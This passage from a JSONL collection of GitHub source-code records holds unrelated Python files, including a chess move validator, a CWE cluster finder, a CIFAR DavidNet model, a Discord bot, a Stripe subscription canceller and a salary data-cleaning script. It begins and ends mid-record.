tchange.groupby(level=0).min().to_dict()\n tchange = tchange.reset_index()\n recent = set(tchange[(tchange.num == tchange.num.max()) & (tchange.exclusive_count > 0)].clade)\n rdf['final_date'] = rdf.proposed_sublineage.apply(lambda x:dates.get(x,np.nan))\n rdf['final_size'] = rdf.proposed_sublineage.apply(lambda x:sizes.get(x,np.nan))\n rdf['active'] = rdf.proposed_sublineage.isin(recent)\n rdf['growth'] = rdf.proposed_sublineage.apply(lambda x:slopes.get(x,np.nan))\n pd = cdf.clade.value_counts().to_dict()\n rdf['persistence'] = rdf.proposed_sublineage.apply(lambda x:pd.get(x,np.nan))\n rdf['total_growth'] = rdf['final_size'] - rdf['proposed_sublineage_size']\n #exclude proposed sublineages that are in turn descendents of existing proposals.\n final = rdf[(rdf.total_growth >= args.final_size) & (rdf.net_escape_gain >= args.escape_change) & (rdf.growth > args.growth) & (args.persistence <= rdf.persistence) & (rdf.parent.apply(lambda x:\"auto.\" not in x))]\n final.to_csv(args.output,sep='\\t',index=False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"jmcbroome/timeseries-lineage-analysis","sub_path":"compile_reports.py","file_name":"compile_reports.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44487844836","text":"class Piece:\n def __init__(self, piece_type, team, top_team='white'):\n self.piece_type = piece_type\n self.team = team\n self.first_move = True # To check if it's the pawn's first move\n self.top_team = top_team\n\n def can_move(self, start, end, board, n_kings, last_double_step_move=None):\n return self.is_valid_move(start,end, board, last_double_step_move) and not self.check_for_pin(board, self.team, start, end, n_kings)\n\n def is_valid_move(self, start, end, board, last_double_step_move=None):\n if self.piece_type == 'p':\n return self.is_valid_pawn_move(start, end, board, last_double_step_move)\n if self.piece_type == 'k':\n return self.is_valid_king_move(start, end, board)\n if self.piece_type == 'q':\n return self.is_valid_queen_move(start, end, board)\n if self.piece_type 
== 'r':\n return self.is_valid_rook_move(start, end, board)\n if self.piece_type == 'b':\n return self.is_valid_bishop_move(start, end, board)\n if self.piece_type == 'n':\n return self.is_valid_knight_move(start, end, board)\n return False\n \n # def is_valid_move(self, start, end, board, last_double_step_move=None):\n # valid_movements = {\n # 'p': self.is_valid_pawn_move,\n # 'k': self.is_valid_king_move,\n # 'q': self.is_valid_queen_move,\n # 'r': self.is_valid_rook_move,\n # 'b': self.is_valid_bishop_move,\n # 'n': self.is_valid_knight_move\n # }\n # validation_function = valid_movements.get(self.piece_type)\n # if validation_function:\n # if self.piece_type == 'p':\n # return validation_function(start, end, board, last_double_step_move)\n # else:\n # return validation_function(start, end, board)\n # return False\n\n def is_valid_pawn_move(self, start, end, board, last_double_step_move=None):\n # Determine the direction of movement based on the top team\n if self.top_team == self.team:\n direction = -1\n start_row = 6\n en_passant_row = 3\n else:\n direction = 1\n start_row = 1\n en_passant_row = 4\n\n # Check if the move is a regular pawn move\n if start[1] == end[1] and board[end[0]][end[1]] is None:\n if start[0] + direction == end[0]:\n return True\n if self.first_move and start[0] + 2 * direction == end[0] and board[start[0] + direction][start[1]] is None:\n return True\n\n # Check if the move is a capture\n if abs(start[1] - end[1]) == 1 and board[end[0]][end[1]] is not None and board[end[0]][end[1]].team != self.team:\n if start[0] + direction == end[0]:\n return True\n\n # Check if the move is an en passant capture\n if last_double_step_move is not None and last_double_step_move[1] == end[1] and last_double_step_move[0] == en_passant_row:\n if start[0] == en_passant_row + direction and end[0] == en_passant_row and abs(start[1] - end[1]) == 1:\n return True\n\n return False\n\n def is_valid_king_move(self, start, end, board):\n dx = abs(end[0] - start[0])\n dy = abs(end[1] - start[1])\n # Check if king is moving to a square within one step\n if dx <= 1 and dy <= 1:\n # If king is in columns 1-6, it cannot move to column 7 or greater\n if start[1] <= 6 and end[1] >= 7:\n return False\n # If king is in columns 8-13, it cannot move to column 7 or less\n elif start[1] >= 8 and end[1] <= 7:\n return False\n # Otherwise, the king is moving within its allowed columns\n else:\n return (board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team)\n else:\n return False\n\n def is_valid_queen_move(self, start, end, board):\n dx = end[0] - start[0]\n dy = end[1] - start[1]\n if dx == 0 or dy == 0 or abs(dx) == abs(dy): # moving in a straight line\n step_x = dx // max(1, abs(dx))\n step_y = dy // max(1, abs(dy))\n for i in range(1, max(abs(dx), abs(dy))):\n # Checking all intermediate squares for pieces\n if board[start[0]+i*step_x][start[1]+i*step_y] is not None:\n return False\n return board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team\n return False\n \n def is_valid_rook_move(self, start, end, board):\n dx = end[0] - start[0]\n dy = end[1] - start[1]\n if dx == 0 or dy == 0: # moving in a straight line\n step_x = dx // max(1, abs(dx)) if dx != 0 else 0\n step_y = dy // max(1, abs(dy)) if dy != 0 else 0\n for i in range(1, max(abs(dx), abs(dy))):\n # Checking all intermediate squares for pieces\n if board[start[0]+i*step_x][start[1]+i*step_y] is not None:\n return False\n return board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team\n 
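 # no straight-line move was requested, so the move can never be legal for a rook;
 # note that queen, rook and bishop all share this ray-walking pattern of stepping
 # one square at a time and scanning every intermediate square for a blocking piece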
return False\n\n def is_valid_bishop_move(self, start, end, board):\n dx = end[0] - start[0]\n dy = end[1] - start[1]\n if abs(dx) == abs(dy): # moving diagonally\n step_x = dx // max(1, abs(dx))\n step_y = dy // max(1, abs(dy))\n for i in range(1, abs(dx)): # dx and dy are same in magnitude\n # Checking all intermediate squares for pieces\n if board[start[0]+i*step_x][start[1]+i*step_y] is not None:\n return False\n return board[end[0]][end[1]] is None or board[end[0]][end[1]].team != self.team\n return False\n\n def is_valid_knight_move(self, start, end, board):\n dx = abs(end[0] - start[0])\n dy = abs(end[1] - start[1])\n # Knight moves two squares in one direction and one in the other\n return (dx, dy) == (2, 1) or (dx, dy) == (1, 2)\n \n def check_for_check(self, board, team, king_pos):\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team != team and piece.is_valid_move((row, col), king_pos, board):\n return True\n return False\n \n def check_for_checkmate(self, board, team, king_pos):\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team == team:\n for i in range(8):\n for j in range(13):\n if piece.is_valid_move((row, col), (i, j), board):\n return False\n return True\n \n def check_for_stalemate(self, board, team, king_pos):\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team == team:\n for i in range(8):\n for j in range(13):\n if piece.is_valid_move((row, col), (i, j), board):\n return False\n return True\n \n def check_for_pin(self, board, team, begin, end, n_kings):\n if n_kings == 2:\n return False\n\n # Find the kings\n king_pos = None\n for row in range(8):\n for col in range(13):\n piece = board[row][col]\n if piece is not None and piece.team == team and piece.piece_type == 'k':\n king_pos = (row, col)\n \n # Check if the piece is pinned\n # Simulate the move\n temp = board[end[0]][end[1]]\n board[end[0]][end[1]] = board[begin[0]][begin[1]]\n board[begin[0]][begin[1]] = None\n\n # Check if the king is in check\n retval = self.check_for_check(board, team, king_pos)\n\n # Undo the move\n board[begin[0]][begin[1]] = board[end[0]][end[1]]\n board[end[0]][end[1]] = temp\n\n return retval\n\n","repo_name":"Lorenc1o/twochess","sub_path":"twochess/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9056862057","text":"import re\nimport consts\n\nclass cwe_cluster_finder:\n\n def __init__(self):\n return\n\n def find_cluster(self, cwe):\n with open(consts.arbre_path) as arbre:\n datafile = arbre.readlines()\n \n with open(consts.liste_no_arbre_path) as not_in_arbre:\n datafile_not_in_arbre = not_in_arbre.readlines()\n\n for line in datafile:\n if '(' + cwe + ')' in line:\n if \"Primary Cluster\" in line:\n return (cwe, None, 'arbre.txt')\n else:\n m = self.find_primary_cluster(line)\n\n if \"Secondary Cluster\" in line:\n return (m, cwe, 'arbre.txt')\n else:\n x = self.find_secondary_cluster(line)\n return (m, x, 'arbre.txt')\n\n else:\n for l in datafile_not_in_arbre:\n if \"CWE-\"+cwe == l.split(\",\")[0]:\n prim_cluster = l.split(\",\")[1]\n sec_cluster = l.split(\",\")[2]\n return (prim_cluster, sec_cluster.rstrip(), 'liste_no_arbre.csv')\n\n def find_primary_cluster(self,l):\n\n primary_cluster = None\n\n with open(consts.arbre_path) as arbre:\n datafile = 
arbre.readlines()\n\n primary = []\n ligne = []\n\n for i, line in enumerate(datafile, 1):\n if l in line:\n num_line_l = i\n\n if \"Primary Cluster\" in line:\n primary.append(str(i)+line)\n\n for p in primary:\n num_line_m = p.split(\"-\")[0]\n\n if int(num_line_m) < num_line_l:\n ligne.append(p)\n\n primary_cluster = str(ligne[-1])\n primary_cluster = re.findall(r\"\\(\\s*\\+?(-?\\d+)\\s*\\)\", primary_cluster)\n primary_cluster = str(primary_cluster)\n primary_cluster = primary_cluster.split(\"'\")[1]\n\n return primary_cluster\n\n def find_secondary_cluster(self,l):\n good_secondary_cluster = []\n m = self.find_primary_cluster(l)\n m = str('(' + m + ')')\n\n n = re.findall(r\"\\(\\s*\\+?(-?\\d+)\\s*\\)\", l)\n n = str(n)\n n = n.split(\"'\")[1]\n n = str('(' + n + ')')\n\n secondary_cluster = None\n\n with open(consts.arbre_path) as arbre:\n \n datafile = arbre.readlines()\n \n secondarys = []\n\n for i, line in enumerate(datafile, 1):\n if n in line:\n num_line_n = int(i)\n\n if m in line:\n num_line_m = int(i)\n\n if \"Secondary Cluster\" in line:\n secondarys.append(str(i)+line)\n\n for s in secondarys:\n num_line_x = s.split('-')[0]\n num_line_x = int(num_line_x)\n\n if num_line_x > num_line_m and num_line_x < num_line_n:\n good_secondary_cluster.append(s)\n\n if len(good_secondary_cluster) == 0:\n return None\n\n else:\n secondary_cluster = str(good_secondary_cluster[-1])\n secondary_cluster = re.findall(r\"\\(\\s*\\+?(-?\\d+)\\s*\\)\", secondary_cluster)\n secondary_cluster = str(secondary_cluster)\n secondary_cluster = secondary_cluster.split(\"'\")[1]\n\n return secondary_cluster","repo_name":"rayan776/predict_cve_exploited","sub_path":"cwe_cluster_finder.py","file_name":"cwe_cluster_finder.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40296870398","text":"import torch\nfrom torch import nn\n\ndef davidnet():\n return DavidNet()\n\nclass BatchNorm(nn.BatchNorm2d):\n def __init__(self, num_features, eps=1e-05, momentum=0.1, weight_freeze=False, bias_freeze=False, weight_init=1.0, bias_init=0.0, **kwargs):\n super().__init__(num_features, eps=eps, momentum=momentum, **kwargs)\n if weight_init is not None: self.weight.data.fill_(weight_init)\n if bias_init is not None: self.bias.data.fill_(bias_init)\n self.weight.requires_grad = not weight_freeze\n self.bias.requires_grad = not bias_freeze\n\nclass ConvBn(nn.Module):\n def __init__(self, ch_in, ch_out, kernel_size=3, padding=1, stride=1) -> None:\n super().__init__()\n self._op = nn.Sequential(\n nn.Conv2d(ch_in, ch_out, kernel_size=kernel_size, stride=stride, padding=padding, bias=False),\n BatchNorm(ch_out),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n return self._op(x)\n\nclass ConvBnPool(nn.Module):\n def __init__(self, ch_in, ch_out, kernel_size=3, padding=1, stride=1) -> None:\n super().__init__()\n self._op = nn.Sequential(\n ConvBn(ch_in, ch_out, kernel_size=kernel_size, stride=stride, padding=padding),\n nn.MaxPool2d(2)\n )\n\n def forward(self, x):\n return self._op(x)\n\nclass ConvRes(nn.Module):\n def __init__(self, ch_in, ch_out) -> None:\n super().__init__()\n self._stem = ConvBnPool(ch_in, ch_out)\n self._op = nn.Sequential(\n ConvBn(ch_out, ch_out),\n ConvBn(ch_out, ch_out)\n )\n\n def forward(self, x):\n h = self._stem(x)\n return h + self._op(h)\n\nclass DavidNet(nn.Module):\n def __init__(self, pretrained=False) -> None:\n super().__init__()\n assert not pretrained\n self._op = 
nn.Sequential(\n ConvBn(3, 64),\n ConvRes(64, 64),\n ConvBnPool(64, 64*2),\n ConvRes(64*2, 64*4),\n nn.AdaptiveMaxPool2d(1),\n )\n self._linear = nn.Linear(in_features=256, out_features=10, bias=True)\n\n def forward(self, x):\n x = self._op(x).squeeze()\n x = self._linear(x)\n return x\n","repo_name":"sytelus/cifar_testbed","sub_path":"torch_testbed/cifar10_models/davidnet.py","file_name":"davidnet.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47968314704","text":"\"\"\"\n\tTrance. A bot developed for Elements, The Music Club.\n\tShe has some commands that deal with:\n\t\t> voting\n\t\t> logging\n\t\t> converting links between platforms\n\n\tDate: 2019-Jun-15\n\"\"\"\nimport discord\nfrom discord.ext import commands\n\nimport asyncio\n\nfrom datetime import datetime\n\nfrom pathlib import Path\nimport os\n\nimport logging\n\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\n\n# List of Directories\ndir_core = Path(\"core/\")\ndir_res = Path(\"res/\")\n\n# READ TOKEN\nwith open(dir_res / \"meta\" / \"TOKEN\", 'r') as TokenFObj:\n\tTOKEN = TokenFObj.read()\n\nBOT_PREFIX = ('++')\nbot = commands.Bot(command_prefix=BOT_PREFIX)\n\n@bot.event\nasync def on_ready():\n\tactivity = discord.Game(\"Music\")\n\tawait bot.change_presence(activity = activity)\n\n\t# LOAD COGS\n\tcogsList = ['cogs.owner.owner', 'cogs.meetup.meetup']\n\t\n\tfor cog in cogsList:\n\t\tprint (\"Loading:\\t\" + cog + \"...\")\n\t\tbot.load_extension(cog)\n\n\tprint (str(bot.user), \"is Ready\")\n\n@bot.event\nasync def on_message(message):\n\tif message.author == bot.user:\n\t\treturn\n\n\tawait bot.process_commands(message)\n\n# RUN THE BOT\nbot.run(TOKEN)\n\n### NOTHING AFTER THIS WORKS","repo_name":"IceCereal/Trance","sub_path":"core/trance.py","file_name":"trance.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16406471990","text":"n = int(input())\narr = list(map(int, input().split()))\nans = [0 for _ in range(n)]\n\nfor i in range(1,n+1): # 1,2,3... 
these represent the heights\n tmp = arr[i-1]\n cnt = 0\n for j in range(n):\n if cnt == tmp and ans[j] == 0:\n ans[j] = i # insert this height at that position \n break # e.g. the person of height 1 has 2 people on their left, so they go in the 3rd position.\n elif ans[j] == 0:\n cnt += 1\nprint(*ans) \n","repo_name":"choijaehoon1/backjoon","sub_path":"greedy_algorithm/test08.py","file_name":"test08.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11958035212","text":"import contextlib\nfrom pathlib import Path\nimport random\nimport re\n\n__import__(\"sys\").path[0:0] = [\".\"]\n\nfrom ..parse_mcd import Transformer\nfrom ..tools.parser_tools import transform_source\nfrom ..tools.string_tools import ascii, camel, snake, pascal, TRUNCATE_DEFAULT_SIZE\nfrom ..mocodo_error import MocodoError\nfrom .cards import fix_card, infer_dfs, infer_roles\nfrom .types import read_default_datatypes, create_type_placeholders, guess_types\nfrom .obfuscate import obfuscator_factory\nfrom .arrows import create_df_arrows\nfrom .constraints import create_cifs\n\nELEMENT_TO_TOKENS = {\n \"arrows\": [\"leg_arrow\"],\n \"attrs\": [\"attr\"],\n \"boxes\": [\"box_name\"],\n \"card_prefixes\": [\"card_prefix\"],\n \"cards\": [\"card\"],\n \"roles\": [\"leg_note\"],\n \"leg_notes\": [\"leg_note\"],\n \"constraint_notes\": [\"constraint_note\"],\n \"labels\": [\"box_name\", \"attr\"],\n \"texts\": [\"box_name\", \"attr\", \"leg_note\", \"constraint_note\"],\n \"notes\": [\"leg_note\", \"constraint_note\"],\n \"types\": [\"datatype\"],\n}\n\nGENERAL_OPERATIONS = { # operations that can be applied to any token\n \"ascii\": ascii,\n \"camel\": camel,\n \"capitalize\": lambda x: x.capitalize(),\n \"casefold\": lambda x: x.casefold(),\n \"echo\": lambda x: x,\n \"lower\": lambda x: x.lower(),\n \"pascal\": pascal,\n \"snake\": snake,\n \"swapcase\": lambda x: x.swapcase(),\n \"title\": lambda x: x.title(),\n \"upper\": lambda x: x.upper(),\n}\n\n\nclass Mapper(Transformer):\n\n def __init__(self, op_name, pre_token, subsubarg, params):\n tokens = ELEMENT_TO_TOKENS[pre_token]\n op = GENERAL_OPERATIONS.get(op_name)\n if op is None: # op_tk operations with limited applicability and/or using a subsubarg\n if op_name == \"randomize\" and pre_token == \"types\":\n resource_dir = Path(params[\"script_directory\"], \"resources\")\n pool = list(dict(read_default_datatypes(resource_dir)).values())\n op = lambda _: random.choice(pool)\n elif op_name == \"delete\" and pre_token in (\"attrs\", \"notes\", \"roles\", \"constraint_notes\", \"arrows\", \"types\", \"card_prefixes\"):\n op = lambda _: \"\"\n elif op_name == \"delete\" and pre_token == \"cards\":\n op = lambda _: \"XX\"\n elif op_name == \"fix\" and pre_token == \"cards\":\n op = fix_card\n elif op_name == \"randomize\" and pre_token in (\"labels\", \"texts\", \"boxes\", \"attrs\", \"notes\", \"roles\", \"constraint_notes\"):\n op = obfuscator_factory(subsubarg, params)\n elif op_name == \"truncate\":\n truncate_size = TRUNCATE_DEFAULT_SIZE\n if subsubarg and subsubarg.isdigit():\n truncate_size = int(subsubarg) or truncate_size\n op = lambda x: x[:truncate_size]\n elif op_name == \"slice\":\n slice_start = slice_stop = None\n if subsubarg:\n with contextlib.suppress(ValueError):\n slice_start = int(subsubarg.partition(\":\")[0])\n with contextlib.suppress(ValueError):\n slice_stop = int(subsubarg.partition(\":\")[2])\n op = lambda x: x[slice_start:slice_stop]\n elif op_name == \"replace\":\n (substring, __, repl) = subsubarg.partition(\"/\")\n op = lambda x: 
x.replace(substring, repl)\n elif op_name == \"suffix\":\n op = lambda x: f\"{x}{subsubarg}\"\n elif op_name == \"prefix\":\n op = lambda x: f\"{subsubarg}{x}\"\n else:\n raise MocodoError(24, _('Operation \"{op_name}\" cannot be applied to \"{pre_token}\".').format(op_name=op_name, pre_token=pre_token))\n update_first_child = lambda tree: tree[0].update(value=op(tree[0].value))\n for token in tokens:\n setattr(self, token, update_first_child)\n\n\ndef run(source, op_name, subargs, params, **kargs):\n if op_name == \"randomize\" and not subargs:\n subargs = {\"labels\": \"\"} # used for obfuscation\n elif op_name == \"delete\" and not subargs:\n subargs = dict.fromkeys(\"types notes attrs cards\".split(), \"\")\n for (pre_token, subsubarg) in subargs.items():\n # filter special non-op_tk operations\n if op_name == \"create\" and pre_token == \"types\":\n source = create_type_placeholders(source, subsubarg) if subsubarg is not None else guess_types(source, params)\n elif op_name == \"create\" and pre_token == \"df_arrows\":\n source = create_df_arrows(source, subsubarg)\n elif op_name == \"create\" and re.match(\"(?i)dfs?$\", pre_token):\n source = infer_dfs(source, params[\"df\"])\n elif op_name == \"create\" and pre_token == \"roles\":\n source = infer_roles(source)\n elif op_name == \"create\" and re.match(\"(?i)cifs?$\", pre_token):\n source = create_cifs(source, subsubarg)\n else: # apply a normal op_tk operation\n source = transform_source(source, Mapper(op_name, pre_token, subsubarg, params))\n if op_name == \"delete\":\n # After a delete operation, remove any [] that may have been left behind\n # (it's too tedious to remove them from the AST, and it's not worth it).\n source = re.sub(r\" *\\[\\]\", \" \", source)\n return source\n","repo_name":"laowantong/mocodo","sub_path":"mocodo/rewrite/op_tk.py","file_name":"op_tk.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"31"} +{"seq_id":"24248271304","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 28 15:24:50 2021\n\n@author: Seong\n\"\"\"\n\nimport pandas as pd\n\ndf = pd.read_csv('glassdoor_jobs.csv')\n\n\n\n\n\n\n\n#salary parsing\ndf['hourly'] = df['Salary Estimate'].apply(lambda x: 1 if 'per hour' in x.lower() else 0)\ndf['employer_provided'] = df['Salary Estimate'].apply(lambda x: 1 if 'employer provided salary' in x.lower() else 0)\ndf = df[df['Salary Estimate'] != '-1']\nSalary = df['Salary Estimate'].apply(lambda x: x.split('(')[0])\nminus_Kd = Salary.apply(lambda x: x.replace('K', '').replace('$',''))\n\nminus_hr = minus_Kd.apply(lambda x: x.lower().replace('per hour', '').replace('employer provided salary:', ''))\n\ndf['min_salary'] = minus_hr.apply(lambda x: int(x.split('-')[0]) if '-' in x else x)\ndf['max_salary'] = minus_hr.apply(lambda x: int(x.split('-')[1]) if '-' in x else x)\ndf['average_salary'] = (df.min_salary.astype(int) + df.max_salary.astype(int))/2\n\n#Removing \"-1\" Ratings\ndf = df[df['Rating'] != -1]\n\n\n#state field\ndf['job_state'] = df['Location'].apply(lambda x: x.split(',')[1] if ',' in x else x)\n\n#Clean up \"Founded\" and calculate age of the company\ndf['company_age'] = df.Founded.apply(lambda x: 0 if x <1 else 2021 - x)\n\n#Parsing job description\ndf['Job Description'][0]\n\n#python\ndf['python'] = df['Job Description'].apply(lambda x: 1 if 'python' in x.lower() else 0)\n\n#R studio\ndf['R studio'] = df['Job Description'].apply(lambda x: 1 if 'r studio' in x.lower() or 'r-studio' in x.lower() 
else 0)\n\n#SQL\ndf['SQL'] = df['Job Description'].apply(lambda x: 1 if 'sql' in x.lower() else 0)\n\n#Power BI\ndf['Power BI'] = df['Job Description'].apply(lambda x: 1 if 'power bi' in x.lower() else 0)\n\n#excel\ndf['Excel'] = df['Job Description'].apply(lambda x: 1 if 'excel' in x.lower() else 0)\n\ndf.to_csv('salary_data_cleaned.csv')\n","repo_name":"SNamStar/ds_salary_proj","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1050628676","text":"#!/usr/bin/python\n\nimport sys, getopt\n\nif __name__ == \"__main__\":\n argv=sys.argv[1:]\n inputfile = ''\n outputfile = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n print('test.py -i <inputfile> -o <outputfile>')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('test.py -i <inputfile> -o <outputfile>')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n# print('Input file is \"', inputfile)\n# print('Output file is \"', outputfile)\n\n input = open(inputfile,\"r\")\n output = open(outputfile,\"w\")\n\n count = 0\n\n lines = input.readlines()\n\n output.write(' '+'\\n')\n for line in lines:\n if count%2==0:\n output.write(line.rstrip('\\n')+ \" \")\n if count%2==1:\n output.write(line)\n sequence_length=(len(line) - line.count(' ')-line.count('\\n'))\n if not line.isspace():\n count+=1\n\n input.close()\n output.close()\n\n output = open(outputfile,\"r+\")\n output.write(str(count/2)+' '+str(sequence_length))\n output.close()\n\n","repo_name":"jeremy0jiang/SRIP","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28378370787","text":"def solution(board, moves):\n answer = 0\n stack = []\n \n for i in range(len(moves)):\n check = moves[i] - 1\n for j in range(len(board)):\n if board[j][check] != 0:\n if stack and stack[-1] == board[j][check]:\n stack.pop()\n answer += 2\n\n else:\n stack.append(board[j][check])\n\n board[j][check] = 0\n break\n \n return answer\n\n\nboard = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\nmoves = [1, 5, 3, 5, 1, 2, 1, 4]\n\nprint(solution(board, moves))","repo_name":"lordloop4700/Playground","sub_path":"python/crain.py","file_name":"crain.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35115384500","text":"import eg\nfrom eg.Classes.UndoHandler import UndoHandlerBase\n\nclass Clear(UndoHandlerBase):\n name = eg.text.MainFrame.Menu.Delete.replace(\"&\", \"\")\n\n @eg.AssertInMainThread\n @eg.LogIt\n def Do(self, item):\n if not item.CanDelete() or not item.AskDelete():\n return\n self.data = item.GetFullXml()\n self.treePosition = eg.TreePosition(item)\n eg.actionThread.Func(item.Delete)()\n self.document.AppendUndoHandler(self)\n\n @eg.AssertInActionThread\n def Redo(self):\n self.treePosition.GetItem().Delete()\n\n @eg.AssertInActionThread\n def Undo(self):\n item = self.document.RestoreItem(self.treePosition, self.data)\n 
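 # RestoreItem rebuilds the deleted node from the XML snapshot and tree position
 # captured in Do(); selecting it afterwards returns focus to the restored item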
item.Select()\n","repo_name":"EventGhost/EventGhost","sub_path":"eg/Classes/UndoHandler/Clear.py","file_name":"Clear.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"31"} +{"seq_id":"41860021331","text":"import csv\nimport logging\n\nimport stripe\nfrom environs import Env\n\n### Setup\n\nlogger = logging.getLogger()\nlogger.setLevel(\"INFO\")\nformatter = logging.Formatter(fmt=\"%(levelname)s %(name)s/%(module)s:%(lineno)d - %(message)s\")\nconsole = logging.StreamHandler()\nconsole.setFormatter(formatter)\nlogger.addHandler(console)\n\nenv = Env()\nenv.read_env()\n\nstripe.api_key = env(\"STRIPE_KEY\")\n\n### Process the CSV\n\nwith open(\"subscriptions.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(f\"processing record for {row['email']} (${row['amount']} each {row['interval']})...\")\n\n print(f\"canceling the Stripe subscription {row['subscription_id']}...\")\n stripe.Subscription.delete(row[\"subscription_id\"])\n","repo_name":"newsrevenuehub/stripe-subscriptions-migrator","sub_path":"cancel.py","file_name":"cancel.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13161040791","text":"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass LTM_transfer(nn.Module):\n def __init__(self,md=4, stride=1):\n super(LTM_transfer, self).__init__()\n self.md = md #displacement (default = 4pixels)\n self.range = (md*2 + 1) ** 2 #(default = (4x2+1)**2 = 81)\n self.grid = None\n self.Channelwise_sum = None\n\n d_u = torch.linspace(-self.md * stride, self.md * stride, 2 * self.md + 1).view(1, -1).repeat((2 * self.md + 1, 1)).view(self.range, 1) # (25,1)\n d_v = torch.linspace(-self.md * stride, self.md * stride, 2 * self.md + 1).view(-1, 1).repeat((1, 2 * self.md + 1)).view(self.range, 1) # (25,1)\n self.d = torch.cat((d_u, d_v), dim=1).cuda() # (25,2)\n\n def L2normalize(self, x, d=1):\n eps = 1e-6\n norm = x ** 2\n norm = norm.sum(dim=d, keepdim=True) + eps\n norm = norm ** (0.5)\n return (x/norm)\n\n def UniformGrid(self, Input):\n '''\n Make uniform grid\n :param Input: tensor(N,C,H,W)\n :return grid: (1,2,H,W)\n '''\n # torchHorizontal = torch.linspace(-1.0, 1.0, W).view(1, 1, 1, W).expand(N, 1, H, W)\n # torchVertical = torch.linspace(-1.0, 1.0, H).view(1, 1, H, 1).expand(N, 1, H, W)\n # grid = torch.cat([torchHorizontal, torchVertical], 1).cuda()\n\n _, _, H, W = Input.size()\n # mesh grid\n xx = torch.arange(0, W).view(1, 1, 1, W).expand(1, 1, H, W)\n yy = torch.arange(0, H).view(1, 1, H, 1).expand(1, 1, H, W)\n\n grid = torch.cat((xx, yy), 1).float()\n\n if Input.is_cuda:\n grid = grid.cuda()\n\n return grid\n\n def warp(self, x, BM_d):\n vgrid = self.grid + BM_d # [N2HW] # [(2d+1)^2, 2, H, W]\n # scale grid to [-1,1]\n vgrid[:, 0, :, :] = 2.0 * vgrid[:, 0, :, :] / max(x.size(3) - 1, 1) - 1.0\n vgrid[:, 1, :, :] = 2.0 * vgrid[:, 1, :, :] / max(x.size(2) - 1, 1) - 1.0\n\n vgrid = vgrid.permute(0, 2, 3, 1)\n output = nn.functional.grid_sample(x, vgrid, mode='bilinear', padding_mode = 'border') #800MB memory occupied (d=2,C=64,H=256,W=256)\n mask = torch.autograd.Variable(torch.ones(x.size())).cuda()\n mask = nn.functional.grid_sample(mask, vgrid) #300MB memory occpied (d=2,C=64,H=256,W=256)\n\n mask = mask.masked_fill_(mask<0.999,0)\n mask = mask.masked_fill_(mask>0,1)\n\n return output * mask\n\n def forward(self,sim_feature, f_map, 
